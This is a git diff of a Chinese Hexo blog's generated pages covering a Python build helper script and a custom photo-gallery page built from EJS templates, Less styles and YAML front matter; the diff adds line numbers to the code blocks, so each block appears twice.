          # 解析 YAML 头部信息
          yaml_header, body = content.split('---\n', 2)[1:]
          yaml_data = yaml.safe_load(yaml_header)
          source_folder = '../temp/_posts/' + item[:-3]
          destination_folder = ('../public/' +
          str(yaml_data['date'].year).zfill(2) + '/' +
          str(yaml_data['date'].month).zfill(2) + '/' +
          str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
          shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
          try:
          shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
          print("完成!")
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          27
          28
          print("后处理 _post 文件……")

          md_list = []
          for item in os.listdir('../source/_posts'):
          if item.endswith('.md'):
          md_list.append(item)

          for item in tqdm(md_list):
          try:
          # 读取 Markdown 文件内容
          with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
          content = file.read()
          # 解析 YAML 头部信息
          yaml_header, body = content.split('---\n', 2)[1:]
          yaml_data = yaml.safe_load(yaml_header)
          source_folder = '../temp/_posts/' + item[:-3]
          destination_folder = ('../public/' +
          str(yaml_data['date'].year).zfill(2) + '/' +
          str(yaml_data['date'].month).zfill(2) + '/' +
          str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
          shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
          try:
          shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
          print("完成!")

          后处理其它文件

          ​ 对于 _posts 下的文件,temp/public/ 的路径一一对应的,要按拷贝回去。最后把临时文件夹 temp/ 删了。

          -
          print("后处理其它文件……")
          for item in tqdm(os.listdir('../temp')):
          if item != '_posts' and item not in ignore_folder:
          item_path = os.path.join('../temp', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../public', item) + ":", e)
          try:
          shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../source', item) + ":", e)

          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          print("完成!")
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          print("后处理其它文件……")
          for item in tqdm(os.listdir('../temp')):
          if item != '_posts' and item not in ignore_folder:
          item_path = os.path.join('../temp', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../public', item) + ":", e)
          try:
          shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../source', item) + ":", e)

          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          print("完成!")

          完整代码

          -
          import os
          import shutil
          from tqdm import tqdm
          import subprocess
          import yaml

          ignore_folder = ['musics']
          ignore_type = ['md', 'ejs']


          def move_non_md_files(src, dst):
          os.makedirs(dst, exist_ok=True)
          # 遍历源文件夹中的所有文件和子文件夹
          for item in os.listdir(src):
          # 构建源文件/文件夹的完整路径
          src_item = os.path.join(src, item)
          # 构建目标文件/文件夹的完整路径
          dst_item = os.path.join(dst, item)

          # 如果是文件夹,则递归地复制文件夹
          if os.path.isdir(src_item):
          move_non_md_files(src_item, dst_item)
          # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
          elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
          shutil.move(src_item, dst)


          print("处理文件……")
          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          for item in tqdm(os.listdir('../source')):
          if item not in ignore_folder:
          item_path = os.path.join('../source', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          move_non_md_files(item_path, os.path.join('../temp',item))
          except Exception as e:
          print(item_path + ":", e)

          print("完成!")

          #####################################################

          print("hexo cl……")
          print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")
          print("hexo g……")
          print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")

          ######################################################

          ## 后处理 _post 文件

          print("后处理 _post 文件……")

          md_list = []
          for item in os.listdir('../source/_posts'):
          if item.endswith('.md'):
          md_list.append(item)

          for item in tqdm(md_list):
          try:
          # 读取 Markdown 文件内容
          with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
          content = file.read()
          # 解析 YAML 头部信息
          yaml_header, body = content.split('---\n', 2)[1:]
          yaml_data = yaml.safe_load(yaml_header)
          source_folder = '../temp/_posts/' + item[:-3]
          destination_folder = ('../public/' +
          str(yaml_data['date'].year).zfill(2) + '/' +
          str(yaml_data['date'].month).zfill(2) + '/' +
          str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
          shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
          try:
          shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
          print("完成!")

          ## 后处理其它文件

          print("后处理其它文件……")
          for item in tqdm(os.listdir('../temp')):
          if item != '_posts' and item not in ignore_folder:
          item_path = os.path.join('../temp', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../public', item) + ":", e)
          try:
          shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../source', item) + ":", e)

          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          print("完成!")
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          27
          28
          29
          30
          31
          32
          33
          34
          35
          36
          37
          38
          39
          40
          41
          42
          43
          44
          45
          46
          47
          48
          49
          50
          51
          52
          53
          54
          55
          56
          57
          58
          59
          60
          61
          62
          63
          64
          65
          66
          67
          68
          69
          70
          71
          72
          73
          74
          75
          76
          77
          78
          79
          80
          81
          82
          83
          84
          85
          86
          87
          88
          89
          90
          91
          92
          93
          94
          95
          96
          97
          98
          99
          100
          101
          102
          103
          104
          105
          106
          import os
          import shutil
          from tqdm import tqdm
          import subprocess
          import yaml

          ignore_folder = ['musics']
          ignore_type = ['md', 'ejs']


          def move_non_md_files(src, dst):
          os.makedirs(dst, exist_ok=True)
          # 遍历源文件夹中的所有文件和子文件夹
          for item in os.listdir(src):
          # 构建源文件/文件夹的完整路径
          src_item = os.path.join(src, item)
          # 构建目标文件/文件夹的完整路径
          dst_item = os.path.join(dst, item)

          # 如果是文件夹,则递归地复制文件夹
          if os.path.isdir(src_item):
          move_non_md_files(src_item, dst_item)
          # 如果是文件且不是 ignore_type 类型下的文件,则复制文件
          elif os.path.isfile(src_item) and src_item.split('.')[-1] not in ignore_type:
          shutil.move(src_item, dst)


          print("处理文件……")
          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          for item in tqdm(os.listdir('../source')):
          if item not in ignore_folder:
          item_path = os.path.join('../source', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          move_non_md_files(item_path, os.path.join('../temp',item))
          except Exception as e:
          print(item_path + ":", e)

          print("完成!")

          #####################################################

          print("hexo cl……")
          print(subprocess.run('hexo cl', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")
          print("hexo g……")
          print(subprocess.run('hexo g', shell=True, capture_output=True, text=True, encoding='utf-8').stdout)
          print("完成!")

          ######################################################

          ## 后处理 _post 文件

          print("后处理 _post 文件……")

          md_list = []
          for item in os.listdir('../source/_posts'):
          if item.endswith('.md'):
          md_list.append(item)

          for item in tqdm(md_list):
          try:
          # 读取 Markdown 文件内容
          with open(os.path.join('../source/_posts', item), 'r', encoding='utf-8') as file:
          content = file.read()
          # 解析 YAML 头部信息
          yaml_header, body = content.split('---\n', 2)[1:]
          yaml_data = yaml.safe_load(yaml_header)
          source_folder = '../temp/_posts/' + item[:-3]
          destination_folder = ('../public/' +
          str(yaml_data['date'].year).zfill(2) + '/' +
          str(yaml_data['date'].month).zfill(2) + '/' +
          str(yaml_data['date'].day).zfill(2) + '/' + item[:-3])
          shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, destination_folder, dirs_exist_ok=True): "+ item + ":", e)
          try:
          shutil.copytree(source_folder, os.path.join('../source/_posts', item[:-3]), dirs_exist_ok=True)
          except Exception as e:
          print("shutil.copytree(source_folder, '../source/_posts'): " + item + ":", e)
          print("完成!")

          ## 后处理其它文件

          print("后处理其它文件……")
          for item in tqdm(os.listdir('../temp')):
          if item != '_posts' and item not in ignore_folder:
          item_path = os.path.join('../temp', item)
          # 判断是否为文件夹
          if os.path.isdir(item_path):
          try:
          shutil.copytree(item_path, os.path.join('../public', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../public', item) + ":", e)
          try:
          shutil.copytree(item_path, os.path.join('../source', item), dirs_exist_ok=True)
          except Exception as e:
          print(os.path.join('../source', item) + ":", e)

          if os.path.isdir('../temp'):
          shutil.rmtree('../temp')

          print("完成!")

          调用 python 文件

          ​ 写一个 .bat 文件快速调用 quick_complie.py

          -
          @echo off
          python quick_complie.py
          echo 按任意键继续……
          pause
          exit
          +
          1
          2
          3
          4
          5
          @echo off
          python quick_complie.py
          echo 按任意键继续……
          pause
          exit
          @@ -4428,6 +4426,8 @@

          目录

          var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/Hexo-\345\215\232\345\256\242\347\233\270\345\206\214\345\212\237\350\203\275\347\232\204\345\274\200\345\217\221/index.html" "b/posts/Hexo-\345\215\232\345\256\242\347\233\270\345\206\214\345\212\237\350\203\275\347\232\204\345\274\200\345\217\221/index.html" index 62a48bcd71..a7f0ce4603 100644 --- "a/posts/Hexo-\345\215\232\345\256\242\347\233\270\345\206\214\345\212\237\350\203\275\347\232\204\345\274\200\345\217\221/index.html" +++ "b/posts/Hexo-\345\215\232\345\256\242\347\233\270\345\206\214\345\212\237\350\203\275\347\232\204\345\274\200\345\217\221/index.html" @@ -44,8 +44,6 @@ - - @@ -421,7 +419,7 @@

          前言

          正文

          子链接的创建

          ​ 在 hexo 项目的 source 文件中,新建一个 galleries 文件夹,再在里面放上 index.md(可以使用命令行),

          -
          hexo new page gallery
          +
          1
          hexo new page gallery

          ​ 渲染博客的时候就会渲染 /galleries 这个网址,如 相册-Zi-Zi’s Journey

          png

          ​ 同样地,如果在 galleries 里放上其它文件夹,文件夹里再放上 index.md,渲染博客的时候就会再渲染下一级的网址,如:…/…/…/…/galleries/研究生 。

          @@ -430,16 +428,16 @@

          png

          相册的入口

          ​ 设置好了子链接就要设置好入口,一般在主题的 _config.yml 中配置。

          -
          # 导航名称
          menus_title:
          home: 主页
          archives: 统计
          categories: 类别
          tags: 标签
          galleries: 相册
          links: 链接
          about: 关于

          # 导航
          menus:
          home: /
          archives: /archives
          categories: /categories
          tags: /tags
          galleries: /galleries
          links: /links
          about: /about
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          # 导航名称
          menus_title:
          home: 主页
          archives: 统计
          categories: 类别
          tags: 标签
          galleries: 相册
          links: 链接
          about: 关于

          # 导航
          menus:
          home: /
          archives: /archives
          categories: /categories
          tags: /tags
          galleries: /galleries
          links: /links
          about: /about

          ​ 渲染博客,导航栏就多了一项 相册,且点进去能够正确转入 /galleries

          png

          ​ 其它有关页面的参数也设置一下:

          -
          # 每个页面的展示的图标和一句话
          headers:
          home: {
          message: "居然被你找到了这里!",
          icon: "/images/logo.png",
          cover: "#f5f9fd"
          }
          archives: {
          # 这里会替换掉两个变量{ year 年,number 总数 } 当然也可以不写这两个变量
          message: "居然用了 year 年一共才写了 number 篇文章!",
          icon: "/images/archives.svg",
          cover: "#f5f9fd"
          }
          categories: {
          message: "好像也没分几类",
          icon: "/images/categories.svg",
          cover: "#f5f9fd"
          }
          tags: {
          message: "这里是一些展示的标签",
          icon: "/images/tags.svg",
          cover: "#f5f9fd"
          }
          galleries: {
          message: "有趣的相册~(施工中)",
          icon: "/images/galleries.svg",
          cover: "#f5f9fd"
          }
          links: {
          message: "给我读过的学校递一杯卡布奇诺~",
          icon: "/images/links.svg",
          cover: "#f5f9fd"
          }
          +
          1
          2
          3
          4
          5
          6
          7
          8
          9
          10
          11
          12
          13
          14
          15
          16
          17
          18
          19
          20
          21
          22
          23
          24
          25
          26
          27
          28
          29
          30
          31
          32
          33
          # 每个页面的展示的图标和一句话
          headers:
          home: {
          message: "居然被你找到了这里!",
          icon: "/images/logo.png",
          cover: "#f5f9fd"
          }
          archives: {
          # 这里会替换掉两个变量{ year 年,number 总数 } 当然也可以不写这两个变量
          message: "居然用了 year 年一共才写了 number 篇文章!",
          icon: "/images/archives.svg",
          cover: "#f5f9fd"
          }
          categories: {
          message: "好像也没分几类",
          icon: "/images/categories.svg",
          cover: "#f5f9fd"
          }
          tags: {
          message: "这里是一些展示的标签",
          icon: "/images/tags.svg",
          cover: "#f5f9fd"
          }
          galleries: {
          message: "有趣的相册~(施工中)",
          icon: "/images/galleries.svg",
          cover: "#f5f9fd"
          }
          links: {
          message: "给我读过的学校递一杯卡布奇诺~",
          icon: "/images/links.svg",
          cover: "#f5f9fd"
          }

          ​ 手撸一个风格相近的图标:

          png

          创建相册页面的布局

          ​ 编辑创建的 index.md,头部信息是由 yaml 语法组成的:

          -
          title: 相册
          date: 2023-12-29 09:46:29
          type: galleries
          layout: galleries
          +
          1
          2
          3
          4
          title: 相册
          date: 2023-12-29 09:46:29
          type: galleries
          layout: galleries

          ​ 以自己所用主题为例,这表示这个网页页面布局将使用 galleries 渲染。

          ​ 我设计了两种页面:

            @@ -451,7 +449,7 @@

            galleries 设计

            index.md

            ​ 给使用 layoutgalleriesindex.md 设计变量,这些变量在galleries.ejs 中会以 page.XXX 的形式读取:

            -
            title: 相册
            date: 2023-12-29 09:46:29
            type: galleries
            layout: galleries
            layout_style: block
            comments: false
            galleries:
            - {title: "研究生", description: "Tell me 他乡的困难会不会比它鼓山高?", cover: "/images/gallery_covers/研究生.jpg"}
            - {title: "本科", description: "闽江江水都流向,流向长乐的海……", cover: "/images/gallery_covers/本科.jpg"}
            - {title: "小时候", description: "我让过去的自己只留在,安静的白马河。", cover: "/images/gallery_covers/小时候.jpg"}
            +
            1
            2
            3
            4
            5
            6
            7
            8
            9
            10
            title: 相册
            date: 2023-12-29 09:46:29
            type: galleries
            layout: galleries
            layout_style: block
            comments: false
            galleries:
            - {title: "研究生", description: "Tell me 他乡的困难会不会比它鼓山高?", cover: "/images/gallery_covers/研究生.jpg"}
            - {title: "本科", description: "闽江江水都流向,流向长乐的海……", cover: "/images/gallery_covers/本科.jpg"}
            - {title: "小时候", description: "我让过去的自己只留在,安静的白马河。", cover: "/images/gallery_covers/小时候.jpg"}
            • title 标题
            • date 时间,但在这里我并没用到
            • @@ -470,16 +468,16 @@

              galleries.ejs

              galleries.ejs 的内容参考如下:(修改 galleries.ejs 的内容要重新生成博客才可以重新渲染,如果调试不方便,可以将代码以 <%- partial('_partial/XXX' %> 跳转到其他地方以便于调试)

              -
              <%- partial('_partial/header',{name:'galleries'}) %>

              <div class="galleries">
              <%- partial('_widget/header_body',{message: page.headers ? page.headers : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
              <div class="main">
              <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>" id="content">
              <% page.galleries.forEach(function(item) { %>
              <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>-content">
              <a class="img-container" href="<%= item.title %>">
              <div class="photo-frames">
              <img style="<%- item.cover_style || '' %>" src="<%= item.cover ? item.cover : theme.default_cover %>" alt="Cover">
              </div>
              <p class="title"><%= item.title %></p>
              </a>
              <div class="description-container"><p><%= item.description %></p></div>
              </div>
              <% }); %>
              <div id="gitalk-container"></div>
              </div>
              </div>
              </div>
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              14
              15
              16
              17
              18
              19
              20
              21
              <%- partial('_partial/header',{name:'galleries'}) %>

              <div class="galleries">
              <%- partial('_widget/header_body',{message: page.headers ? page.headers : theme.headers.galleries.message, icon:theme.headers.galleries.icon, cover: theme.headers.galleries.cover}) %>
              <div class="main">
              <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>" id="content">
              <% page.galleries.forEach(function(item) { %>
              <div class="post-<%= page.layout_style ? page.layout_style : 'block' %>-content">
              <a class="img-container" href="<%= item.title %>">
              <div class="photo-frames">
              <img style="<%- item.cover_style || '' %>" src="<%= item.cover ? item.cover : theme.default_cover %>" alt="Cover">
              </div>
              <p class="title"><%= item.title %></p>
              </a>
              <div class="description-container"><p><%= item.description %></p></div>
              </div>
              <% }); %>
              <div id="gitalk-container"></div>
              </div>
              </div>
              </div>

              ​ 就是将读取到信息展示在页面上的逻辑。

              galleries.less

              ​ 创建并编写对应的 galleries.less 如下(记得在一个地方引用):

              -
              .galleries{
              .main {
              display: flex;
              flex-grow: 1;
              flex-basis: auto;
              flex-direction: column;
              margin-top: -64px;
              .post-block{
              padding: 0 calc((100% - 1160px)/2);
              margin-bottom: 50px;
              &-content{
              margin: 20px 100px 60px 100px;
              text-decoration: none;
              height: 240px;
              justify-content: center; /* 添加此行以实现水平居中对齐 */
              display: grid;
              grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
              grid-gap: 10px; /* 控制子容器之间的间距 */
              position: relative;
              top: 0px;
              transition: all .5s ease-in-out;
              -moz-transition: all .5s;
              -webkit-transition: all .5s;
              -o-transition: all .5s;
              &:hover {
              top: -15px;
              }
              .img-container{
              justify-content: center;
              display: flex;
              transform: rotate(-5deg);
              transition: transform ease-in-out 0.5s;
              &:hover {
              transform: rotate(-10deg);
              }
              .photo-frames{
              width: 200px;
              border: 10px solid #FFF; /* 相框的边框样式和颜色 */
              border-radius: 5px;
              background: #FFF;
              box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
              img{
              border-radius: 2px;
              margin-top: 10px;
              width: 100%;
              height: 75%;
              object-fit: cover;
              }
              }
              }
              .title{
              bottom: 15px;
              position: absolute;
              font-weight: bold;
              text-decoration: none;
              color: @textColorTheme;
              font-size: 22px;
              font-weight: 500;
              }
              .description-container{
              margin-top: 80px;
              p{
              text-indent: 2em;
              font-size: 20px;
              position: absolute;
              }
              }
              }
              @media screen and (max-width:660px) {
              &-content{
              margin: 20px;
              padding: 20px;
              .title{
              bottom: 5%;
              }
              .description-container{
              p{
              font-size: 18px;
              }
              }
              }
              }
              @media screen and (max-width:489px) {
              &-content{
              height: 320px;
              margin-bottom: 40px;
              .img-container{
              .photo-frames{
              width: 60vw;
              }
              }
              .description-container{
              margin-top: 40px;
              }
              }
              }
              }

              .post-card{
              display: flex;
              max-width: 100%;
              padding: 0 calc((100% - 1200px)/2) 40px;
              flex-wrap: wrap;
              justify-content: center;
              align-items: stretch;
              margin-top: -64px;
              &-content{
              margin: 20px 40px 80px 40px;
              text-decoration: none;
              height: 400px;
              justify-content: center; /* 添加此行以实现水平居中对齐 */
              display: grid;
              grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
              grid-gap: 10px; /* 控制子容器之间的间距 */
              position: relative;
              top: 0px;
              transition: all .5s ease-in-out;
              -moz-transition: all .5s;
              -webkit-transition: all .5s;
              -o-transition: all .5s;
              &:hover {
              top: -15px;
              }
              .img-container{
              justify-content: center;
              display: flex;
              transform: rotate(-5deg);
              transition: transform ease-in-out 0.5s;
              &:hover {
              transform: rotate(-10deg);
              }
              .photo-frames{
              width: 220px;
              border: 10px solid #FFF; /* 相框的边框样式和颜色 */
              border-radius: 5px;
              background: #FFF;
              box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
              img{
              border-radius: 2px;
              margin-top: 10px;
              width: 100%;
              height: 75%;
              object-fit: cover;
              }
              }
              }
              .title{
              bottom: 20px;
              position: absolute;
              font-weight: bold;
              text-decoration: none;
              color: @textColorTheme;
              font-size: 22px;
              font-weight: 500;
              }
              .description-container{
              margin-top: 40px;
              p{
              text-indent: 2em;
              font-size: 20px;
              position: absolute;
              }
              }
              }

              @media screen and (max-width:640px) {
              &-content{
              margin: 80px 20px;
              padding: 20px;
              height: 400px;
              .title{
              bottom: 5%;
              }
              .img-container{
              .photo-frames{
              width: 60vw;
              }
              }
              .description-container{
              p{
              font-size: 18px;
              }
              }
              }
              }
              }
              }
              }
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              14
              15
              16
              17
              18
              19
              20
              21
              22
              23
              24
              25
              26
              27
              28
              29
              30
              31
              32
              33
              34
              35
              36
              37
              38
              39
              40
              41
              42
              43
              44
              45
              46
              47
              48
              49
              50
              51
              52
              53
              54
              55
              56
              57
              58
              59
              60
              61
              62
              63
              64
              65
              66
              67
              68
              69
              70
              71
              72
              73
              74
              75
              76
              77
              78
              79
              80
              81
              82
              83
              84
              85
              86
              87
              88
              89
              90
              91
              92
              93
              94
              95
              96
              97
              98
              99
              100
              101
              102
              103
              104
              105
              106
              107
              108
              109
              110
              111
              112
              113
              114
              115
              116
              117
              118
              119
              120
              121
              122
              123
              124
              125
              126
              127
              128
              129
              130
              131
              132
              133
              134
              135
              136
              137
              138
              139
              140
              141
              142
              143
              144
              145
              146
              147
              148
              149
              150
              151
              152
              153
              154
              155
              156
              157
              158
              159
              160
              161
              162
              163
              164
              165
              166
              167
              168
              169
              170
              171
              172
              173
              174
              175
              176
              177
              178
              179
              180
              181
              182
              183
              184
              185
              186
              187
              188
              .galleries{
              .main {
              display: flex;
              flex-grow: 1;
              flex-basis: auto;
              flex-direction: column;
              margin-top: -64px;
              .post-block{
              padding: 0 calc((100% - 1160px)/2);
              margin-bottom: 50px;
              &-content{
              margin: 20px 100px 60px 100px;
              text-decoration: none;
              height: 240px;
              justify-content: center; /* 添加此行以实现水平居中对齐 */
              display: grid;
              grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
              grid-gap: 10px; /* 控制子容器之间的间距 */
              position: relative;
              top: 0px;
              transition: all .5s ease-in-out;
              -moz-transition: all .5s;
              -webkit-transition: all .5s;
              -o-transition: all .5s;
              &:hover {
              top: -15px;
              }
              .img-container{
              justify-content: center;
              display: flex;
              transform: rotate(-5deg);
              transition: transform ease-in-out 0.5s;
              &:hover {
              transform: rotate(-10deg);
              }
              .photo-frames{
              width: 200px;
              border: 10px solid #FFF; /* 相框的边框样式和颜色 */
              border-radius: 5px;
              background: #FFF;
              box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
              img{
              border-radius: 2px;
              margin-top: 10px;
              width: 100%;
              height: 75%;
              object-fit: cover;
              }
              }
              }
              .title{
              bottom: 15px;
              position: absolute;
              font-weight: bold;
              text-decoration: none;
              color: @textColorTheme;
              font-size: 22px;
              font-weight: 500;
              }
              .description-container{
              margin-top: 80px;
              p{
              text-indent: 2em;
              font-size: 20px;
              position: absolute;
              }
              }
              }
              @media screen and (max-width:660px) {
              &-content{
              margin: 20px;
              padding: 20px;
              .title{
              bottom: 5%;
              }
              .description-container{
              p{
              font-size: 18px;
              }
              }
              }
              }
              @media screen and (max-width:489px) {
              &-content{
              height: 320px;
              margin-bottom: 40px;
              .img-container{
              .photo-frames{
              width: 60vw;
              }
              }
              .description-container{
              margin-top: 40px;
              }
              }
              }
              }

              .post-card{
              display: flex;
              max-width: 100%;
              padding: 0 calc((100% - 1200px)/2) 40px;
              flex-wrap: wrap;
              justify-content: center;
              align-items: stretch;
              margin-top: -64px;
              &-content{
              margin: 20px 40px 80px 40px;
              text-decoration: none;
              height: 400px;
              justify-content: center; /* 添加此行以实现水平居中对齐 */
              display: grid;
              grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
              grid-gap: 10px; /* 控制子容器之间的间距 */
              position: relative;
              top: 0px;
              transition: all .5s ease-in-out;
              -moz-transition: all .5s;
              -webkit-transition: all .5s;
              -o-transition: all .5s;
              &:hover {
              top: -15px;
              }
              .img-container{
              justify-content: center;
              display: flex;
              transform: rotate(-5deg);
              transition: transform ease-in-out 0.5s;
              &:hover {
              transform: rotate(-10deg);
              }
              .photo-frames{
              width: 220px;
              border: 10px solid #FFF; /* 相框的边框样式和颜色 */
              border-radius: 5px;
              background: #FFF;
              box-shadow: 0 20px 40px 0 rgba(50,50,50,0.2);
              img{
              border-radius: 2px;
              margin-top: 10px;
              width: 100%;
              height: 75%;
              object-fit: cover;
              }
              }
              }
              .title{
              bottom: 20px;
              position: absolute;
              font-weight: bold;
              text-decoration: none;
              color: @textColorTheme;
              font-size: 22px;
              font-weight: 500;
              }
              .description-container{
              margin-top: 40px;
              p{
              text-indent: 2em;
              font-size: 20px;
              position: absolute;
              }
              }
              }

              @media screen and (max-width:640px) {
              &-content{
              margin: 80px 20px;
              padding: 20px;
              height: 400px;
              .title{
              bottom: 5%;
              }
              .img-container{
              .photo-frames{
              width: 60vw;
              }
              }
              .description-container{
              p{
              font-size: 18px;
              }
              }
              }
              }
              }
              }
              }

              演示

              ​ 大功告成,对应的 block 风格页面:相册-Zi-Zi’s Journey

              png

              \研究生\index.md 的布局:

              -
              title: 研究生
              date: 2023-12-29 14:47:00
              type: galleries
              layout: galleries
              layout_style: card
              headers: 大河之北
              galleries:
              - {title: "福州", description: "WAIYA! 鼓山脚 南门兜 我如鱼得水", cover: "/images/gallery_covers/研究生/福州.jpg"}
              - {title: "保定-春夏", description: "保定没有爱情,只有他蜡笔还不完的饥荒。", cover: "/images/gallery_covers/研究生/保定-春夏.jpg"}
              - {title: "保定-秋冬", description: "雪花飘飘,北风萧萧。", cover: "/images/gallery_covers/研究生/保定-秋冬.jpg"}
              - {title: "石家庄", description: "直到大厦崩塌", cover: "/images/gallery_covers/研究生/石家庄.jpg"}
              - {title: "厦门", description: "再鼓楼润湖里搞涢涢!", cover: "/images/gallery_covers/研究生/厦门.jpg"}
              - {title: "武汉", description: "这辈子又可以见到小迷糊了!", cover: "/images/gallery_covers/研究生/武汉.jpg"}
              - {title: "雄安", description: "千年大计,国家大事。", cover: "/images/gallery_covers/研究生/雄安.jpg"}
              - {title: "天津", description: "天天乐道,津津有味。", cover: "/images/gallery_covers/研究生/天津.jpg"}
              - {title: "正定", description: "太能走了凡哥!", cover: "/images/gallery_covers/研究生/正定.jpg"}
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              14
              15
              16
              title: 研究生
              date: 2023-12-29 14:47:00
              type: galleries
              layout: galleries
              layout_style: card
              headers: 大河之北
              galleries:
              - {title: "福州", description: "WAIYA! 鼓山脚 南门兜 我如鱼得水", cover: "/images/gallery_covers/研究生/福州.jpg"}
              - {title: "保定-春夏", description: "保定没有爱情,只有他蜡笔还不完的饥荒。", cover: "/images/gallery_covers/研究生/保定-春夏.jpg"}
              - {title: "保定-秋冬", description: "雪花飘飘,北风萧萧。", cover: "/images/gallery_covers/研究生/保定-秋冬.jpg"}
              - {title: "石家庄", description: "直到大厦崩塌", cover: "/images/gallery_covers/研究生/石家庄.jpg"}
              - {title: "厦门", description: "再鼓楼润湖里搞涢涢!", cover: "/images/gallery_covers/研究生/厦门.jpg"}
              - {title: "武汉", description: "这辈子又可以见到小迷糊了!", cover: "/images/gallery_covers/研究生/武汉.jpg"}
              - {title: "雄安", description: "千年大计,国家大事。", cover: "/images/gallery_covers/研究生/雄安.jpg"}
              - {title: "天津", description: "天天乐道,津津有味。", cover: "/images/gallery_covers/研究生/天津.jpg"}
              - {title: "正定", description: "太能走了凡哥!", cover: "/images/gallery_covers/研究生/正定.jpg"}

              ​ 对应的 card 风格页面:

              • 研究生-Zi-Zi’s Journey
              • @@ -488,7 +486,7 @@

                演示

                index.md

                ​ 同理,给使用 layoutgalleryindex.md 设计变量,这些变量在gallery.ejs 中会以 page.XXX 的形式读取:

                -
                title: 保定-秋冬
                date: 2023-12-29 14:47:00
                type: gallery
                layout: gallery
                description: 你们南方人的四季是不完整的。——阿杰
                imgs:
                - {title: "积雪的人行道", src: ../../../XXX.jpg}
                - ...
                - {title: "和美保定", src: ../../../XXX.jpg}
                comments: true
                +
                1
                2
                3
                4
                5
                6
                7
                8
                9
                10
                title: 保定-秋冬
                date: 2023-12-29 14:47:00
                type: gallery
                layout: gallery
                description: 你们南方人的四季是不完整的。——阿杰
                imgs:
                - {title: "积雪的人行道", src: ../../../XXX.jpg}
                - ...
                - {title: "和美保定", src: ../../../XXX.jpg}
                comments: true
                • title 标题

                  @@ -520,7 +518,7 @@

                  import os

                  for file in os.listdir(r'D:\Study\GzBlog-Github\source\_posts\Diary-浙了(二)'):
                  print(' ' + r'- {title: "XXX", src: /2024/02/26/Diary-浙了(二)/' + file + '}')
                  +
                  1
                  2
                  3
                  4
                  import os

                  for file in os.listdir(r'D:\Study\GzBlog-Github\source\_posts\Diary-浙了(二)'):
